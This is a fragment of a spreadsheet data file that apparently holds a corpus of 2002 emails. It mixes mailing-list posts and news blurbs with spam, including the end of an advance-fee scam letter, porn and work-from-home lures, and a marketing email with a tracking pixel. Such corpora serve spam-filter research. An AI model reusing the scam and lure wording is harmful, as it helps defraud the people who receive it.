 of the consignment to your name as the beneficiary of the 
 consignment.
 Also send me your Telephone and Fax numbers for easy 
 communication
 Once you notify me your willingness by sending the above 
 requirement.This transaction will be concluded within 7 
 (seven) working days.
 I will be waiting for your urgent reply.You can reach me on 
 my Cell Telephone No: 234-80- 33055024 or my alternative E-
 mail: williamsfalana@caramail.com 
 Best regards, 
 Barrister Williams Falana {SAN} 
 _________________________________________________________ 
 Envoyez des messages musicaux sur le portable de vos amis 
  http://mobile.lycos.fr/mobile/local/sms_musicaux/
 --=_NextPart_Caramail_0190361032516937_ID--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: West Nile vaccine "in three years"
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8251867,1440/
 Date: Not supplied
 A genetically engineered yellow fever vaccine shows promise in animal tests - 
 if fast-tracked it could soon be available for humans
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Phone companies compared
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524777
 Date: Not supplied
 The WSJ has published a round-up of phone companies, wired and wireless, 
 ranking them based on performance and price. They don't mention Nextel, whose 
 hullking milspec i700 handset I've been carrying for years now, with incredible 
 reception all over the US and Canada. Their front-line customer service sucks, 
 but the prices and network can't be beat. 
     T-Mobile is in the midst of a massive makeover. In recent months, the 
     company changed its name and launched an ad campaign featuring Ms. Zeta 
     Jones. 
     The company has a history worth hiding. T-Mobile, a subsidiary of Deutsche 
     Telekom, is known for having a weak national network, and the FCC received 
     1,466 complaints about the company in the past year, giving it one of the 
     worst complaint rates in the industry. T-Mobile says their complaint rate 
     has tapered off and that they have made substantial network improvements. 
     But T-Mobile is the cheapest wireless provider, available, with an average 
     cost of just 8.2 cents per minute. (Verizon, by contrast, costs 14.3 cents 
     per minute.)  
 Link[1] Discuss[2] (_via Camworld[3]_)
 [1] http://www.msnbc.com/news/816517.asp
 [2] http://www.quicktopic.com/boing/H/VKy7KfS2A7jUZ
 [3] http://www.camworld.com
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 Content-Type: text/plain; charset=us-ascii
 In message &lt;3703.1033415613@dimebox.bmc.com&gt;, Hal DeVore writes:
 &gt;&gt;&gt;&gt;&gt;&gt; On Mon, 30 Sep 2002, "Ted" == Ted Cabeen wrote:
 &gt;
 &gt;  Ted&gt; Here's the code for everybody and the list archives in
 &gt;  Ted&gt; case anyone wants it in the future.
 &gt;
 &gt;Very cool!  I vote for this being added to CVS, any objections?
 Not from me, although you probably want to change the name of the procedure.  
 :)
 - -- 
 Ted Cabeen           http://www.pobox.com/~secabeen            ted@impulse.net 
 Check Website or Keyserver for PGP/GPG Key BA0349D2         secabeen@pobox.com
 "I have taken all knowledge to be my province." -F. Bacon  secabeen@cabeen.org
 "Human kind cannot bear very much reality."-T.S.Eliot        cabeen@netcom.com
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (FreeBSD)
 Comment: Exmh version 2.5 07/13/2001
 iD8DBQE9mK24oayJfLoDSdIRAs21AKDYeoDgFYgSUldYusaLxJTbcsPxuQCdHaFG
 Z4P4FqmRJlqCbvmKFJMNgJI=
 =dC6l
 -----END PGP SIGNATURE-----
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">I think one step towards deployment is creating a re-usable tokenizer
 for mail messages.  The current codebase doesn't expose an easy-to-use
 or easy-to-customize tokenizer.
 The timtest module seems to contain an enormous body of practical
 knowledge about how to parse mail messages, but the module wasn't
 designed for re-use.  I'd like to see a module that can take a single
 message or a collection of messages and tokenize each one.
 I'd like to see the tokenize by customizable, too.  Tim had to exclude
 some headers from his test data, because there were particular biases
 in the test data.  If other people have test data without those
 biases, they ought to be able to customize the tokenizer to include
 them or exclude others.
 Jeremy
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for this, I'm going to give them another try.  One question: How
 do I switch between digital out and analog out with ALSA?  With
 emu10k1-tools it's easy enough (emu-config -d for digital, emu-config -a
 for analog)  Is there a similar method with ALSA?
 Lance
 On Wed, 2002-08-28 at 12:00, Matthias Saou wrote:
 &gt; Followup to the story :
 &gt; 
 &gt; I've now made a sub-package of alsa-driver called "alsa-kernel" which
 &gt; contains only the kernel modules, and alsa-driver contains everything else
 &gt; from the original package (device entries, include files and docs).
 &gt; 
 &gt; This should allow installation of a single "alsa-driver" package and
 &gt; multiple "alsa-kernel" if you have more than one kernel installed. Right
 &gt; now the dependencies make it mandatory to have kernels installed through
 &gt; rpm... people who install from source can still install the ALSA modules
 &gt; from the source though ;-)
 &gt; 
 &gt; The devices are there now, thank Gordon for reporting the problem (and as I
 &gt; said, you were the only one). Any further comments are very welcome!
 &gt; 
 &gt; Download : http://ftp.freshrpms.net/pub/freshrpms/testing/alsa/
 &gt; New spec : http://freshrpms.net/builds/alsa-driver/alsa-driver.spec
 &gt; 
 &gt; If you aren't running kernel-2.4.18-10 for i686, simply --rebuild the
 &gt; alsa-driver source rpm and you'll get a package for your running kernel.
 &gt; 
 &gt; Matthias
 &gt; 
 &gt; -- 
 &gt; Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 &gt; Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 &gt; Load : 0.08 0.42 0.84, AC on-line, battery charging: 100% (6:36)
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 -- 
 :
 ####[ Linux One Stanza Tip (LOST) ]###########################
 Sub : Finding out files larger than given size       LOST #324
 To find out all files in a dir over a given size, try:
 find /path/to/dir_of_file -type f -size +Nk
 [Where N is a number like 1024 for 1mb, and multiples thereof] 
 ####[Discussions on LIH : 04 Jul 2002]########################
 :
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --_----------=_103005139443991
 Content-Disposition: inline
 Content-Transfer-Encoding: binary
 Content-Type: text/plain
 Dear dELiA*s Contests member,
 If you can see this, you have been subscribed to the
 mailing list as an HTML email user.  To switch to
 plain text mail, go to:
 http://lists.iturf.com/bcast/totext.epl?lid=127&amp;em=CARRIE@AXESS.COM
 You are subscribed as: CARRIE@AXESS.COM
 You signed up to receive updates on exclusive specials and happenings at dELiAs.cOm. We'd love to continue to bring you this news, however, if you wish to remove yourself from this mailing list, go to:
 http://www.delias.com/unsubscribe.epl?lid=127&amp;em=CARRIE@AXESS.COM&amp;jid=1251&amp;rid=4448995 
 --_----------=_103005139443991
 Content-Disposition: inline
 Content-Transfer-Encoding: binary
 Content-Type: text/html
 &lt;img width='1' height='1' src="http://lists.iturf.com/bcast/open.gif?mid=1251&amp;rid=4448995" alt=" "&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;dELiAs.cOm&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR="#FFFFFF" MARGINBORDER="0" WIDTH=0 MARGINHEIGHT=0 TOPMARGIN=0 LEFTMARGIN=0&gt;
 &lt;TABLE BORDER=0 CELLPADDING=10 CELLSPACING=0 ALIGN="CENTER"&gt;
 &lt;TR&gt;
 	&lt;TD&gt;
 &lt;TABLE BORDER="0" WIDTH=704 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;TABLE BORDER="0" WIDTH=704 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
 		&lt;TD ROWSPAN=2&gt;
 			&lt;A HREF="http://www.delias.com/index.html?_QQ=100-21394"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/header.gif" BORDER="0" WIDTH=217 HEIGHT=44&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD COLSPAN=7&gt;
 			&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/forward.gif" BORDER="0" WIDTH=487 HEIGHT=26&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/goto.gif" BORDER="0" WIDTH=44 HEIGHT=18&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/cat.epl?g=category.denim&amp;_QQ=100-21395"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/denim.gif" BORDER="0" WIDTH=57 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/cat.epl?g=category.pants&amp;_QQ=100-21396"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/pants.gif" BORDER="0" WIDTH=62 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/cat.epl?g=category.shoes&amp;_QQ=100-21397"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/shoes.gif" BORDER="0" WIDTH=56 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/cat.epl?g=category.tops&amp;_QQ=100-21398"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/tops.gif" BORDER="0" WIDTH=53 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/cat.epl?g=category.roomwares&amp;_QQ=100-21399"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/07_05_02/roomwares.gif" BORDER="0" WIDTH=81 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/closeouts/index.epl?_QQ=100-21400"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/discount.gif" BORDER="0" WIDTH=134 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 			&lt;/TABLE&gt;
 		&lt;/TD&gt;	
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD ALIGN="CENTER"&gt;
 			&lt;TABLE BORDER="0" WIDTH=700 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/coats.gif" BORDER="0" WIDTH=392 HEIGHT=106 BORDER=0 USEMAP="#coats_Map"&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/model.jpg" BORDER="0" WIDTH=308 HEIGHT=106&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/item.epl?i=10081&amp;_QQ=100-21401"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/peacoat.gif" BORDER="0" WIDTH=129 HEIGHT=160&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/item.epl?i=10082&amp;_QQ=100-21402"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/madison.gif" BORDER="0" WIDTH=135 HEIGHT=160&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/item.epl?i=10080&amp;_QQ=100-21403"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/caravan.gif" BORDER="0" WIDTH=128 HEIGHT=160&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/item.epl?i=10081&amp;_QQ=100-21404"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/peacoat1.jpg" BORDER="0" WIDTH=308 HEIGHT=160&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/daisy.gif" BORDER="0" WIDTH=392 HEIGHT=112 BORDER=0 USEMAP="#daisy_Map"&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/item.epl?i=10081&amp;_QQ=100-21405"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/peacoat2.jpg" BORDER="0" WIDTH=308 HEIGHT=112&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 	&lt;/TD&gt;
 &lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=11&gt;&lt;BR&gt;&lt;FONT SIZE="1" COLOR="#999999" FACE="ARIAL, HELVETICA, SANS-SERIF"&gt;You are subscribed as: CARRIE@AXESS.COM&lt;BR&gt;&lt;BR&gt;You signed up to receive updates on exclusive specials and happenings at dELiAs*cOm. We'd love to continue to bring you this news, however, if you wish to remove yourself from this mailing list, &lt;A HREF="http://www.delias.com/unsubscribe.epl?lid=127&amp;em=CARRIE@AXESS.COM&amp;jid=1251&amp;rid=4448995"&gt;&lt;FONT SIZE="1" COLOR="#999999"&gt;Click here&lt;/FONT&gt;&lt;/A&gt;. Please do not reply to this message.  If you have any questions, comments, or would like to send feedback to dELiA*s, please send an e-mail to: &lt;A HREF="mailto:help@delias.com"&gt;&lt;FONT SIZE="1" COLOR="#999999" FACE="ARIAL, HELVETICA, VERDANA"&gt;help@delias.com&lt;/FONT&gt;&lt;/A&gt;.&lt;/FONT&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD ALIGN="CENTER" COLSPAN=11&gt;&lt;BR&gt;&lt;FONT SIZE="1" COLOR="#999999" FACE="ARIAL, HELVETICA, VERDANA"&gt;&amp;#153; and &amp;#169; 2002 dELiA*s Corp.  All rights reserved.&lt;/FONT&gt;&lt;/TD&gt;
     &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
     &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;MAP NAME="coats_Map"&gt;
 &lt;AREA SHAPE="rect" ALT="Shop Now" COORDS="0,88,92,106" HREF="http://www.delias.com/shop.html?_QQ=100-21406"&gt;
 &lt;/MAP&gt;
 &lt;MAP NAME="daisy_Map"&gt;
 &lt;AREA SHAPE="rect" ALT="Daisy Dollars" COORDS="208,67,335,92" HREF="http://www.delias.com/daisy.html?_QQ=100-21407"&gt;
 &lt;/MAP&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;!--L127:J1251:R4448995--&gt;
 --_----------=_103005139443991--
</t>
  </si>
  <si>
    <t xml:space="preserve">Hmm - I'm cc'ing the exmh-workers list, because I really don't know
 much about the various PGP interfaces.  I think there has been some
 talk about "issues" with the latest version of gpg.
 &gt;&gt;&gt;Hacksaw said:
  &gt; version 2.5 08/15/2002
  &gt; Linux habitrail.home.fools-errant.com 2.4.7-10smp #1 SMP Thu Sep 6 
 17:09:31
  &gt; EDT 2001 i686 unknown
  &gt; Tk 8.3 Tcl 8.3
  &gt; 
  &gt; It's not clear to me this is a bug with exmh per se, but it's something 
 that
  &gt; manifests through exmh, so I figured asking you might help me track it 
 down.
  &gt; 
  &gt; When I receive a gpg encrypted message, and it asks me for a passphrase, 
 it
  &gt; first tries to ask me via the tty under which exmh is running. It tells 
 me m
      y 
  &gt; passphrase is incorrect every time, at which point exmh offers me the 
 line i
      n 
  &gt; the message about decrypting. I click the line and it offers me the 
 dialog
  &gt; box, and tells me the passphrase is correct, and shows me the decrypted 
  &gt; message.
  &gt; 
  &gt; Any ideas on that?
  &gt; -- 
  &gt; Honour necessity.
  &gt; http://www.hacksaw.org -- http://www.privatecircus.com -- KB1FVD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</si>
  <si>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Subject: ALL FOR FREE!    CHECK OUT THESE 100% FREE ADULT SITES!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;100% Free Porn!&lt;br&gt;
 What more can you ask for?&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font size="4"&gt;&lt;a href="http://216.129.174.178/"&gt;CLICK HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;REMOVAL INSTRUCTIONS: We strive to never send unsolicited mail.&lt;br&gt;
 However, if you'd rather not receive future e-mails from us,&lt;br&gt;
 &lt;a href="mailto:cheech@inbox.lv"&gt;CLICK HERE&lt;/a&gt; to send email and add the word REMOVE in the subject line.&lt;br&gt;
 Please allow 48 hours for processing.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [J7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 19 Aug 2002, Joseph S. Barrera III wrote:
 &gt; In fact, with a 1GB microdrive in my camera, I often just keep
 &gt; old pictures around, and I can show people pictures using the
 &gt; camera's display. Which is bound to be better than the cell phone's.
 A detachable clip-on eyepiece display could be arbitrarily high-res. Now
 that we see first OLED prototypes (cheap, can be printed on curved
 surfaces resulting in cheaper optics) it can't be more than 5 years off.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Earn Extra Income**
</t>
  </si>
  <si>
    <t xml:space="preserve">Want to make a million bucks this year?
 Me too but it's probably not going happen!
 However if you're looking for the opportunity to
 make a couple thousand a week,
 working from home with your pc, we need to talk.
 If you're over 18 and a US resident,
 Just Click REPLY
 Send me your Name, State,
 Complete telephone number,
 and the best time to contact you.
 I will personally speak with you within 48 hours.
  Have a great day!  
 Removal instructions:
 *************************
 To be removed from this list please reply with "remove" in the subject line.
 Please allow a few days for removal to take effect. Thanks!!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</si>
  <si>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On Wed, 2002-07-24 at 18:14, James Rogers wrote:
 &gt; I don't think a ballistic missile defense system will be much help
 &gt; against a rock a couple thousand kilometers in diameter.
 Errrr... Or a couple thousand *meters* in diameter either.
 -James Rogers
  jamesr@best.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Filter Film Capacitor
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_w06gnvwSMBJCZhhJJKsn0sSgc1kn
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_w06gnvwSMBJCZhhJJKsn0sSgc1knAA"
 ------=_NextPart_w06gnvwSMBJCZhhJJKsn0sSgc1knAA
 Content-Type: text/plain;
 Content-Transfer-Encoding: quoted-printable
 To : Engineering and Purchasing Manager, 
 We would like to take this chance to introduce our new series of Capacitor : 
 Filter Capacitor
 Application : 
 -High Frequency and Current AC, DC filter circuit; EMC Filter application
 Electrical Characteristic :
 -Capacitance : customer design
 -Tol : =A1=D310%, =A1=D35% at 23=A2J 1kHz
 -Voltage : customer designed, AC &amp; DC is available
 -Testing Voltage : 1.3 x Un 60sec (can be customer design)=A1V DC application
                              : According to EN132400 =A1V AC application
 -Low ESR and ESL
 -High Current carrying capacity
 -Temperature range : -55 ~ 85=A2J (full voltage rating)
 Should you have any inquiries, please do not hesitate to contact us. Quotation and samples will be sent upon request. Thanks for your kind attention and look forward to hearing from you soon.
 Best Regards,
 Goman Siu
 Hong Kong Film Capacitor (Shun Tai) Co Ltd
 1/F, Po Yip St, 23 Hing Yip St, Kwun Tong, Hong Kong
 Tel:852-27958795
 Fax:852-27958189
 http://www.filmcapacitor-st.com
 gomansiu@filmcapacitor-st.com
 We apologize for any inconvenience cause by this e-mail.
 If you would like to be removed from our mailing list, please reply this mail with "unsubscribe+ your e-mail address" in the Subject.
 ------=_NextPart_w06gnvwSMBJCZhhJJKsn0sSgc1knAA--
 ------=_NextPart_w06gnvwSMBJCZhhJJKsn0sSgc1kn
 Content-Type: application/octet-stream;
 	name="J:\Shun Tai-Cap\Filter Cap.JPG"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment;
 	filename="Filter Cap.JPG"
 /9j/4AAQSkZJRgABAQEASABIAAD/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAY
 AAAAsgAAABABAgAMAAAAygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgB
 AwABAAAAAgAAADEBAgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEA
 AAADAABPTFlNUFVTIERJR0lUQUwgQ0FNRVJBICAgICAgICAgAE9MWU1QVVMgT1BUSUNBTCBDTy4s
 TFREAEM5MDBaLEQ0MDBaAAAASAAAAAEAAABIAAAAAQAAAHY4NzJwLTcxAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAMjAwMjowNjowNyAxODo0NjoxMQAWAJqCBQABAAAAKgIAAJ2CBQABAAAAMgIAACeI
 AwABAAAAZAAAAACQBwAEAAAAMDIxMAOQAgAUAAAAOgIAAASQAgAUAAAATgIAAAGRBwAEAAAAAQID
 AAKRBQABAAAAYgIAAASSCgABAAAAagIAAAWSBQABAAAAcgIAAAeSAwABAAAABQAAAAiSAwABAAAA
 AAAAAAmSAwABAAAAAAAAAAqSBQABAAAAegIAAHySBwCWAQAAfAMAAIaSBwB9AAAAggIAAACgBwAE
 AAAAMDEwMAGgAwABAAAAAQAAAAKgBAABAAAAAAUAAAOgBAABAAAAwAMAAAWgBAABAAAAXgMAAACj
 BwABAAAAAwAAAAAAAAABAAAAVAAAACwAAAAKAAAAMjAwMjowNjowNyAxODo0NjoxMQAyMDAyOjA2
 OjA3IDE4OjQ2OjExAAEAAAABAAAAAAAAAAoAAAADAAAAAQAAAJ0AAAAKAAAAAAAAAAAAAAAgICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAA
 BgADAQMAAQAAAAYAAAAaAQUAAQAAAE4DAAAbAQUAAQAAAFYDAAAoAQMAAQAAAAIAAAABAgQAAQAA
 ANwHAAACAgQAAQAAANAPAAAAAAAASAAAAAEAAABIAAAAAQAAAAIAAQACAAQAAABSOTgAAgAHAAQA
 AAAwMTAwAAAAAE9MWU1QAAEACwAAAgQAAwAAAA4EAAABAgMAAQAAAAIAAAACAgMAAQAAAAAAAAAD
 AgMAAQAAAAAAAAAEAgUAAQAAABoEAAAFAgUAAQAAACIEAAAGAggABgAAACoEAAAHAgIABQAAADYE
 AAAIAgIANAAAAD4EAAAJAgcAIAAAAHoEAAAADwQAHgAAAJoEAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAoAAACYAgAAZAAAAA4ANABBACMAWwBsAFNSODcyAAAAW3BpY3R1cmVJbmZvXSBSZXNvbHV0aW9u
 PTIgW0NhbWVyYSBJbmZvXSBUeXBlPVNSODcyAAAAAAAAAAAAT0xZTVBVUyBESUdJVEFMIENBTUVS
 QQAAAAAAAAAAAAABDQCAAXRZAAAAAAEAAAAAMd4AAAAAAAAuDAAAM7wAAC6fAAAvZQAAL8UCAQAA
 B3QAAASdAKIAAAAAAAAAAAAAAHsAAAAALy8OAAAAAAACAAAAAAAAABYFAAA9ABo+ECF0AABiUwAA
 wA8O////AJJ5knkAAEMhAAD/////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////////////////
 ////////////////////////////////////////////////////////////////2P/bAMUADQkK
 CwoIDQsLCw8ODRAUIRUUEhIUKB0eGCEwKjIxLyouLTQ7S0A0OEc5LS5CWUJHTlBUVVQzP11jXFJi
 S1NUUQEODw8UERQnFRUnUTYuNlFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFR
 UVFRUVFRUVFRUVFRAg4PDxQRFCcVFSdRNi42UVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFR
 UVFRUVFRUVFRUVFRUVFRUVFRUVH/xAGiAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgsQAAIB
 AwMCBAMFBQQEAAABfQECAwAEEQUSITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJChYXGBka
 JSYnKCkqNDU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6g4SFhoeIiYqSk5SV
 lpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2drh4uPk5ebn6Onq8fLz9PX2
 9/j5+gEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoLEQACAQIEBAMEBwUEBAABAncAAQIDEQQF
 ITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdI
 SUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1
 tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/wAARCAB4AKADASEAAhEB
 AxEB/9oADAMBAAIRAxEAPwDz4X0g/jqVdSkH8Q/OlYLsmTVpB1qVdZcY/wAaLBcnXWR3JqZNVVu/
 50WHcztVu97EA8uPyFZYahCY4fWnIjyOEjRnY9AoyTTAvQ6NqMwDC3KqT1chcfgeauReG7gt+9nj
 Uf7ILf4U7CNGHQbOL74eXj+Jsfyq9Hbww58qJE/3VAzTAcVqMj2oAYyg9hUTQqe1AET2yntVd7X2
 oA5XFGKkYYo/E0ALz6mrVrY310R5EEjg9GxhfzPFAGlB4Xv5ArSvFECeQWyw/Lj9a0IfCkSt+9un
 dfRUCn8+aegGhbaFp9tg+T5rD+KQ7v06fpV9I0jQJGiqo6BRgCgQpWk20hjStIUpiGlajYcUARsK
 YaAEIphoAxP+Ecv9udkX030v/CNXx/hj/wC+6SQ2SxeFLlmHmTRIvfblj+VXoPClqmDNNJIQc8YU
 Een+TTA1bXS7O0IMFsisCSGxlh+J5q3tNIA20baADb7UbaADbRtoATbSFfagBhU+lMZDQBE0ZPam
 NGfSgCMoRUZz3pgaoFLikgHClFAC0UALiigApaACigBKQigBCKYRQA0rxTStADGSq7R0AX6WktgF
 pRTAUUuKAFxRigAooAY00attLjNOVlYZVgw9jUKcW7J6js7XFoqxCYppFACEU0igBpFROtAFgUtC
 AKWgBacDQAUtABUU5wm0NtZuAamT5U2C1KhjIzgowA9cYphUD7yMCOcjmvElFp3Z1JoesjjhZzz/
 AHqlFxMOqK4/2TXRTxNSOm6JlBPyGjUITOIWDI59RwKt16cJc0U7WMGrMQ0hFUIaRTGWgB4paAFp
 aACigClJqtut19mQ75M4OOgPpTW1NQCA6bvocVLlYaVyM6yIZVSeL5WGd6Hj8qq6pdhrh3QsVRFC
 88NkZyPrkflWOId6TsVBe8Zq3ksJ2RyyRuTgBwWGenX06/nVuPVJI0SR1ViOSI+cA98VxuN1c2JB
 q1u7AFih9HXB9+au24N0W2SiIBGcyDkKB3rL2T50n1HzK1yss8l1Oskz7pNuPwHtWzbktboT6Yr2
 EczJKSmIbSGgBQKWgApRQAtFAHNy2kQ1KSSSWSNdxYFFyQ2fcinxvbkM00XzHoBx/I4rm9tDaXQ0
 5Huhk81vInMBDgYU5xgf5zVNjudll5zg/hgEf0rGpU5tI7I0jG24jRZjdVfls4zyBn2qARSq2TGp
 GeCjYIrOMkt9BtMmjeNMROjsCwUF8Ef54pZ7iU3IjidlAQ7sHGc9jVUk3VUhS0i0S2krCZmbO1Tg
 D3rqLcYt4+MZUHFd6MGSGm1QhKQ0AKKWgBaWgA4xS9KAMG8GbiT/AHjVUivJqfGzqjsiJxwadcxx
 tBHOrAMIwHHritKUea6FN2syok8b8K4z6d6mG7samUWtGCdxee4qzbWyLm45LPkEHtitsOvfJqbD
 0h3SIhHG7nb3rfVvl5rtRix24Umc0xCGkoAUUtAC0tADS2KaTkc0AY16rRSM0ikITkMBkfj6VW3o
 Rncv515talJSbSvc6ISViP8A1rbY1Ln2HA+pq1JbxLbKsgBIHPpmtqNNx1ZM5J6IzVsobp9oieM5
 wNwxn6Usmj3cHMUjfStXHS26IuQl76DiSIOB7VYttTBxE0MmSeABmohBRldFN3VmbtpAU/euMMeQ
 PSre7IrqMgGaeKAAmmk0APFLQAtHPagBu3PWkK0ANCmmmCJjlolJ+lIBfJXsMVXuYCYvkXJHalYZ
 RSGUTKUiZcHkldv/AOutNNxHzCiwCmBZPvKKEs4YzlUAb1xRZBcf5fPWl2VQhcU3JBxQAuaTNAD6
